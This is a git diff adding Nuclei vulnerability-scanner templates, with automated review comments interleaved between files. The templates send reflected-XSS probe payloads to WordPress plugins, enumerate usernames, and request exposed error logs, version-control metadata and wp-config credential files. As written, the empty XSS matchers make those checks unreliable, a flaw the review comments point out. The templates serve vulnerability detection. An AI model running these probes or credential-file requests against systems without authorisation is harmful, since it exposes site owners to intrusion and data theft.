diff --git a/CVE-2011-4618.yaml b/CVE-2011-4618.yaml
new file mode 100644
index 0000000..6593682
--- /dev/null
+++ b/CVE-2011-4618.yaml
@@ -0,0 +1,29 @@
+id: CVE-2011-4618
+
+info:
+ name: Advanced Text Widget < 2.0.2 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4618
+ tags: cve,cve2011,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/advanced-text-widget/advancedtext.php?page=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/CVE-2011-4624.yaml b/CVE-2011-4624.yaml
new file mode 100644
index 0000000..5ad804b
--- /dev/null
+++ b/CVE-2011-4624.yaml
@@ -0,0 +1,29 @@
+id: CVE-2011-4624
+
+info:
+ name: GRAND FlAGallery 1.57 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4624
+ tags: cve,cve2011,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/CVE-2011-4926.yaml b/CVE-2011-4926.yaml
new file mode 100644
index 0000000..bc278b7
--- /dev/null
+++ b/CVE-2011-4926.yaml
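Review bot: The body matcher in CVE-2011-4618.yaml is `words: - ""`, and an empty string is a substring of every response body, so that check can never fail and the template reports any 200 text/html page whether or not the payload was reflected. The word should be the decoded payload sent in the path, here `- "<script>alert(123)</script>"`, so a hit means the input came back unescaped. The same empty matcher is in CVE-2011-4624, CVE-2011-4926, CVE-2011-5107, CVE-2011-5179, CVE-2011-5181, CVE-2011-5265, CVE-2012-0901, CVE-2012-2371, CVE-2012-4242, CVE-2012-5913, CVE-2013-2287, CVE-2013-3526, CVE-2014-9094, CVE-2019-14470, CVE-2019-15889, CVE-2020-29395, wp-ambience-xss, wp-church-admin-xss, wp-finder-xss, wp-knews-xss, wp-phpfreechat-xss, wp-securimage-xss and wp-socialfit-xss, each of which should match its own decoded payload (several use `alert(1)`, CVE-2012-2371 an img onerror, and wp-church-admin-xss can match `alert('{{randstr}}')`). Most of these files also end without a trailing newline.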
@@ -0,0 +1,29 @@
+id: CVE-2011-4926
+
+info:
+ name: Adminimize 1.7.22 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4926
+ tags: cve,cve2011,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/CVE-2011-5107.yaml b/CVE-2011-5107.yaml
new file mode 100644
index 0000000..d62a889
--- /dev/null
+++ b/CVE-2011-5107.yaml
@@ -0,0 +1,29 @@
+id: CVE-2011-5107
+
+info:
+ name: Alert Before Your Post <= 0.1.1 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5107
+ tags: cve,cve2011,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/CVE-2011-5179.yaml b/CVE-2011-5179.yaml
new file mode 100644
index 0000000..ba0bd6e
--- /dev/null
+++ b/CVE-2011-5179.yaml
@@ -0,0 +1,29 @@
+id: CVE-2011-5179
+
+info:
+ name: Skysa App Bar 1.04 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5179
+ tags: cve,cve2011,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/CVE-2011-5181.yaml b/CVE-2011-5181.yaml
new file mode 100644
index 0000000..1ee7cb8
--- /dev/null
+++ b/CVE-2011-5181.yaml
@@ -0,0 +1,29 @@
+id: CVE-2011-5181
+
+info:
+ name: ClickDesk Live Support - Live Chat 2.0 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5181
+ tags: cve,cve2011,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/CVE-2011-5265.yaml b/CVE-2011-5265.yaml
new file mode 100644
index 0000000..109499f
--- /dev/null
+++ b/CVE-2011-5265.yaml
@@ -0,0 +1,29 @@
+id: CVE-2011-5265
+
+info:
+ name: Featurific For WordPress 1.6.2 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5265
+ tags: cve,cve2011,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/CVE-2012-0901.yaml b/CVE-2012-0901.yaml
new file mode 100644
index 0000000..6f20b82
--- /dev/null
+++ b/CVE-2012-0901.yaml
@@ -0,0 +1,29 @@
+id: CVE-2012-0901
+
+info:
+ name: YouSayToo auto-publishing 1.0 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2012-0901
+ tags: cve,cve2012,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/CVE-2012-2371.yaml b/CVE-2012-2371.yaml
new file mode 100644
index 0000000..e9bf01a
--- /dev/null
+++ b/CVE-2012-2371.yaml
@@ -0,0 +1,29 @@
+id: CVE-2012-2371
+
+info:
+ name: WP-FaceThumb 0.1 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2012-2371
+ tags: cve,cve2012,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%22%3E%3Cimg%2Fsrc%3Dx%20onerror%3Dalert%28123%29%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/CVE-2012-4242.yaml b/CVE-2012-4242.yaml
new file mode 100644
index 0000000..791034e
--- /dev/null
+++ b/CVE-2012-4242.yaml
@@ -0,0 +1,29 @@
+id: CVE-2012-4242
+
+info:
+ name: WordPress Plugin MF Gig Calendar 0.9.2 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4242
+ tags: cve,cve2012,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/?page_id=2&%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2012-5913.yaml b/CVE-2012-5913.yaml
new file mode 100644
index 0000000..23512f1
--- /dev/null
+++ b/CVE-2012-5913.yaml
@@ -0,0 +1,29 @@
+id: CVE-2012-5913
+
+info:
+ name: WordPress Integrator 1.32 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2012-5913
+ tags: cve,cve2012,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3CScrIpT%3Ealert%28123%29%3C%2FScrIpT%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/CVE-2013-2287.yaml b/CVE-2013-2287.yaml
new file mode 100644
index 0000000..33a0b55
--- /dev/null
+++ b/CVE-2013-2287.yaml
@@ -0,0 +1,29 @@
+id: CVE-2013-2287
+
+info:
+ name: WordPress Plugin Uploader 1.0.4 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2013-2287
+ tags: cve,cve2013,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3Cscript%3Ealert%28123%29;%3C/script%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2013-3526.yaml b/CVE-2013-3526.yaml
new file mode 100644
index 0000000..b081219
--- /dev/null
+++ b/CVE-2013-3526.yaml
@@ -0,0 +1,29 @@
+id: CVE-2013-3526
+
+info:
+ name: WordPress Plugin Traffic Analyzer - 'aoid' Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2013-3526
+ tags: cve,cve2013,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2014-9094.yaml b/CVE-2014-9094.yaml
new file mode 100644
index 0000000..81ae8ce
--- /dev/null
+++ b/CVE-2014-9094.yaml
@@ -0,0 +1,29 @@
+id: CVE-2014-9094
+
+info:
+ name: WordPress DZS-VideoGallery Plugin Reflected Cross Site Scripting
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094
+ tags: cve,2014,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2017-5487.yaml b/CVE-2017-5487.yaml
new file mode 100644
index 0000000..8668479
--- /dev/null
+++ b/CVE-2017-5487.yaml
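Review bot: The tag `2014` in CVE-2014-9094.yaml breaks the `cveYYYY` naming every other template in this commit uses (`cve2011`, `cve2012`, `cve2013`, `cve2017`, `cve2019`, `cve2020`), so a tag filter on cve2014 would silently skip this template. Change the line to `tags: cve,cve2014,wordpress,xss,wp-plugin`.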
@@ -0,0 +1,35 @@
+id: CVE-2017-5487
+
+info:
+ name: WordPress Core < 4.7.1 - Username Enumeration
+ author: Manas_Harsh,daffainfo,geeknik
+ severity: info
+ description: wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request.
+ tags: cve,cve2017,wordpress
+ reference: |
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-5487
+ - https://www.exploit-db.com/exploits/41497
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-json/wp/v2/users/"
+ - "{{BaseURL}}/?rest_route=/wp/v2/users/"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: header
+ words:
+ - "application/json"
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - '"id":'
+ - '"name":'
+ - '"avatar_urls":'
+ condition: and
diff --git a/CVE-2019-14470.yaml b/CVE-2019-14470.yaml
new file mode 100644
index 0000000..291551f
--- /dev/null
+++ b/CVE-2019-14470.yaml
@@ -0,0 +1,31 @@
+id: CVE-2019-14470
+
+info:
+ name: WordPress Plugin UserPro 4.9.32 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: |
+ - https://wpscan.com/vulnerability/9815
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14470
+ tags: cve,cve2019,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(1)%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2019-15889.yaml b/CVE-2019-15889.yaml
new file mode 100644
index 0000000..0f46219
--- /dev/null
+++ b/CVE-2019-15889.yaml
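Review bot: `reference: |` in CVE-2017-5487.yaml turns the two URLs into one literal block string, leading dashes and newline included, instead of a YAML sequence of two references, so anything that reads the references as a list gets a single malformed entry. Drop the `|` so the two `- https://...` lines that follow are parsed as list items under `reference:`. The same construct is used in CVE-2019-14470.yaml, CVE-2020-29395.yaml and wp-socialfit-xss.yaml (the `description: |` in the last one is fine, since that value is prose).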
@@ -0,0 +1,29 @@
+id: CVE-2019-15889
+
+info:
+ name: WordPress Plugin Download Manager 2.9.93 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889
+ tags: cve,cve2019,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2020-29395.yaml b/CVE-2020-29395.yaml
new file mode 100644
index 0000000..2de1016
--- /dev/null
+++ b/CVE-2020-29395.yaml
@@ -0,0 +1,31 @@
+id: CVE-2020-29395
+
+info:
+ name: Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: |
+ - https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-29395
+ tags: cve,cve2020,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/README.md b/README.md
index 1704c20..33f5a1f 100644
--- a/README.md
+++ b/README.md
@@ -1,3 +1,2 @@
-###
-Binded these templates here from so many repos as One!
-Great Love to the guys who made it!
+# my-nuclei-templates
+Some contributions in the nuclei-templates repository
diff --git a/error-logs.yaml b/error-logs.yaml
new file mode 100644
index 0000000..fef1228
--- /dev/null
+++ b/error-logs.yaml
@@ -0,0 +1,57 @@
+id: error-logs
+info:
+ name: common error log files
+ author: geeknik,daffainfo
+ severity: low
+ tags: logs,exposure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/routes/error_log"
+ - "{{BaseURL}}/config/error_log"
+ - "{{BaseURL}}/error_log"
+ - "{{BaseURL}}/errors_log"
+ - "{{BaseURL}}/logs/error.log"
+ - "{{BaseURL}}/logs/errors.log"
+ - "{{BaseURL}}/log/error.log"
+ - "{{BaseURL}}/log/errors.log"
+ - "{{BaseURL}}/errors/errors.log"
+ - "{{BaseURL}}/error/error.log"
+ - "{{BaseURL}}/errors.log"
+ - "{{BaseURL}}/error.log"
+ - "{{BaseURL}}/error.txt"
+ - "{{BaseURL}}/errors.txt"
+ - "{{BaseURL}}/admin/logs/error.log"
+ - "{{BaseURL}}/admin/logs/errors.log"
+ - "{{BaseURL}}/admin/log/error.log"
+ - "{{BaseURL}}/admin/error.log"
+ - "{{BaseURL}}/admin/errors.log"
+ - "{{BaseURL}}/{{Hostname}}/error.log"
+ - "{{BaseURL}}/{{Hostname}}/errors.log"
+ - "{{BaseURL}}/MyErrors.log"
+ - "{{BaseURL}}/log.txt"
+ - "{{BaseURL}}/logs.txt"
+ - "{{BaseURL}}/log.log"
+ - "{{BaseURL}}/application/logs/application.log"
+ - "{{BaseURL}}/application/logs/default.log"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Segmentation Fault"
+ - "coredump"
+ - "script headers"
+ - "Broken pipe"
+ - "Array"
+ condition: or
+
+ - type: word
+ words:
+ - text/plain
+ part: header
+
+ - type: status
+ status:
+ - 200
diff --git a/exposed-bitkeeper.yaml b/exposed-bitkeeper.yaml
new file mode 100644
index 0000000..dded588
--- /dev/null
+++ b/exposed-bitkeeper.yaml
@@ -0,0 +1,27 @@
+id: exposed-bitkeeper
+
+info:
+ name: Exposed BitKeeper Directory
+ author: daffainfo
+ severity: low
+ reference: https://www.bitkeeper.org/man/config-etc.html
+ tags: config,exposure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/BitKeeper/etc/config"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "BitKeeper configuration"
+ - "logging"
+ - "email"
+ - "description"
+ condition: and
+
+ - type: status
+ status:
+ - 200
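Review bot: The body matcher in error-logs.yaml lists `- "Array"` under `condition: or`, so any 200 text/plain response that contains the word Array (a dumped PHP variable, a README, a data file) satisfies the template with no error log present at all; `- "script headers"` is nearly as broad. Drop `"Array"` or pair it with a log-specific token the match must also contain, so that a finding means an actual log file was served. The `id:` line is also the only one in this commit not followed by a blank line before `info:`; minor, but worth matching the sibling files.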
diff --git a/exposed-bzr.yaml b/exposed-bzr.yaml
new file mode 100644
index 0000000..c90b345
--- /dev/null
+++ b/exposed-bzr.yaml
@@ -0,0 +1,30 @@
+id: exposed-bzr
+
+info:
+ name: Exposed BZR Directory
+ author: daffainfo
+ severity: low
+ reference: http://doc.bazaar.canonical.com/beta/en/user-reference/configuration-help.html
+ tags: config,exposure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/.bzr/branch/branch.conf"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "parent_location"
+ - "push_location"
+ condition: or
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: header
+ words:
+ - "text/plain"
\ No newline at end of file
diff --git a/exposed-darcs.yaml b/exposed-darcs.yaml
new file mode 100644
index 0000000..002d61e
--- /dev/null
+++ b/exposed-darcs.yaml
@@ -0,0 +1,23 @@
+id: exposed-darcs
+
+info:
+ name: Exposed Darcs Config
+ author: daffainfo
+ severity: low
+ reference: http://darcs.net/Using/Configuration#sources
+ tags: config,exposure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/_darcs/prefs/binaries"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Binary file regexps"
+
+ - type: status
+ status:
+ - 200
diff --git a/exposed-hg.yaml b/exposed-hg.yaml
new file mode 100644
index 0000000..62ba7da
--- /dev/null
+++ b/exposed-hg.yaml
@@ -0,0 +1,24 @@
+id: exposed-hg
+
+info:
+ name: Exposed HG Directory
+ author: daffainfo
+ severity: low
+ tags: config,exposure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/.hg/hgrc"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "[paths]"
+ - "default"
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/wordpress-accessible-wpconfig.yaml b/wordpress-accessible-wpconfig.yaml
new file mode 100644
index 0000000..5347bbc
--- /dev/null
+++ b/wordpress-accessible-wpconfig.yaml
@@ -0,0 +1,39 @@
+id: wordpress-accessible-wpconfig
+info:
+ name: WordPress accessible wp-config
+ author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo
+ severity: high
+ tags: wordpress,backups
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-config.php'
+ - '{{BaseURL}}/.wp-config.php.swp'
+ - '{{BaseURL}}/wp-config-sample.php'
+ - '{{BaseURL}}/wp-config.inc'
+ - '{{BaseURL}}/wp-config.old'
+ - '{{BaseURL}}/wp-config.txt'
+ - '{{BaseURL}}/wp-config.php.txt'
+ - '{{BaseURL}}/wp-config.php.bak'
+ - '{{BaseURL}}/wp-config.php.old'
+ - '{{BaseURL}}/wp-config.php.dist'
+ - '{{BaseURL}}/wp-config.php.inc'
+ - '{{BaseURL}}/wp-config.php.swp'
+ - '{{BaseURL}}/wp-config.php.html'
+ - '{{BaseURL}}/wp-config-backup.txt'
+ - '{{BaseURL}}/wp-config.php.save'
+ - '{{BaseURL}}/wp-config.php~'
+ - '{{BaseURL}}/wp-config.php.orig'
+ - '{{BaseURL}}/wp-config.php.original'
+ - '{{BaseURL}}/_wpeprivate/config.json'
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - DB_NAME
+ - WPENGINE_ACCOUNT
+ part: body
+ - type: status
+ status:
+ - 200
diff --git a/wp-ambience-xss.yaml b/wp-ambience-xss.yaml
new file mode 100644
index 0000000..84fb6e9
--- /dev/null
+++ b/wp-ambience-xss.yaml
@@ -0,0 +1,29 @@
+id: wp-ambience-xss
+
+info:
+ name: WordPress Theme Ambience - 'src' Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://www.exploit-db.com/exploits/38568
+ tags: wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/themes/ambience/thumb.php?src=%3Cbody%20onload%3Dalert(1)%3E.jpg'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/wp-church-admin-xss.yaml b/wp-church-admin-xss.yaml
new file mode 100644
index 0000000..1b5fa99
--- /dev/null
+++ b/wp-church-admin-xss.yaml
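Review bot: `wp-config-sample.php` in the path list of wordpress-accessible-wpconfig.yaml is the stock file shipped with every WordPress install and carries only placeholder values, yet when a server returns it as text it satisfies the `DB_NAME` word matcher and is reported at `severity: high` as if real credentials were exposed. Either drop that path or make the body matcher require something the sample cannot contain. Note too that the word matcher has no `condition:`, so `DB_NAME` or `WPENGINE_ACCOUNT` alone is enough (the default is or); if that is intended, say so with an explicit `condition: or` so the next reader does not assume both must appear.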
@@ -0,0 +1,29 @@
+id: wp-church-admin-xss
+
+info:
+ name: WordPress Plugin church_admin - 'id' Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://www.securityfocus.com/bid/54329/info
+ tags: wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3Cscript%3Ealert%28'{{randstr}}'%29%3C/script%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/wp-finder-xss.yaml b/wp-finder-xss.yaml
new file mode 100644
index 0000000..c2141ac
--- /dev/null
+++ b/wp-finder-xss.yaml
@@ -0,0 +1,29 @@
+id: wp-finder-xss
+
+info:
+ name: WordPress Plugin Finder - 'order' Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://www.securityfocus.com/bid/55217/info
+ tags: wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3Cscript%3Ealert(123);%3C/script%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/wp-knews-xss.yaml b/wp-knews-xss.yaml
new file mode 100644
index 0000000..198ba8e
--- /dev/null
+++ b/wp-knews-xss.yaml
@@ -0,0 +1,29 @@
+id: wp-knews-xss
+
+info:
+ name: WordPress Plugin Knews Multilingual Newsletters - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://www.securityfocus.com/bid/54330/info
+ tags: wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E '
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/wp-phpfreechat-xss.yaml b/wp-phpfreechat-xss.yaml
new file mode 100644
index 0000000..986f908
--- /dev/null
+++ b/wp-phpfreechat-xss.yaml
@@ -0,0 +1,29 @@
+id: wp-phpfreechat-xss
+
+info:
+ name: WordPress Plugin PHPFreeChat - 'url' Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://www.securityfocus.com/bid/54332/info
+ tags: wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/wp-securimage-xss.yaml b/wp-securimage-xss.yaml
new file mode 100644
index 0000000..a7d4a9d
--- /dev/null
+++ b/wp-securimage-xss.yaml
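Review bot: The single path in wp-knews-xss.yaml appears to end with a space inside the quotes, `%3C/script%3E '`, and YAML keeps whitespace inside a quoted scalar, so the request URL would carry a literal trailing space after the payload. The whitespace in this rendering is collapsed, so confirm against the file, and if the space is there remove it so the line ends `%3C/script%3E'`.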
@@ -0,0 +1,29 @@
+id: wp-securimage-xss
+
+info:
+ name: WordPress Plugin Securimage-WP - 'siwp_test.php' Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://www.securityfocus.com/bid/59816/info
+ tags: wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/securimage-wp/siwp_test.php/%22/%3E%3Cscript%3Ealert(1);%3C/script%3E?tested=1'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/wp-socialfit-xss.yaml b/wp-socialfit-xss.yaml
new file mode 100644
index 0000000..50082d8
--- /dev/null
+++ b/wp-socialfit-xss.yaml
@@ -0,0 +1,29 @@
+id: wp-socialfit-xss
+
+info:
+ name: WordPress Plugin SocialFit - 'msg' Cross-Site Scripting
+ author: daffainfo
+ severity: medium
+ description: |
